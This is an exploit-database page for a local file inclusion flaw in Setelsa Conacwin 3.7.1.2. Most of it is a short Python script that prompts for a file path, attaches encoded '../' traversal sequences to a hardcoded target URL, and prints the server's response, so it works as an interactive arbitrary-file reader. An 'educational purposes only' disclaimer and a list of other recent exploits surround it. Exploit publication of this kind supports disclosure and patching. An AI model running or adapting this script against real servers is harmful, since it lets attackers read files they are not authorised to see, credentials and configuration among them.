Setelsa conacwin 3.7.1.2 local file inclusion Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-12-01 | Type : webapps | Platform : multiple
This exploit / vulnerability Setelsa conacwin 3.7.1.2 local file inclusion is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
# Date: 02/09/20
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
# Version: 3.7.1.2
# Tested on: Windows
# FIX: The recommendation from the vendor is to update to the last version.

import requests
import urllib.parse
import colorama

from colorama import Fore, Style

ENDPOINT = "http://10.4.8.11:8081/"

while True:
cmd = input(Fore.RED + "[*] FILE >> ")
print(Style.RESET_ALL)

#cmd = urllib.parse.quote(cmd)
ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd

print("[*] Target >> " + ENDPOINT2)
print(" ")
r = requests.get(url = ENDPOINT2)

extract = r.text
print(extract)

Setelsa conacwin 3.7.1.2 local file inclusion


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Setelsa conacwin 3.7.1.2 local file inclusion Vulnerability / Exploit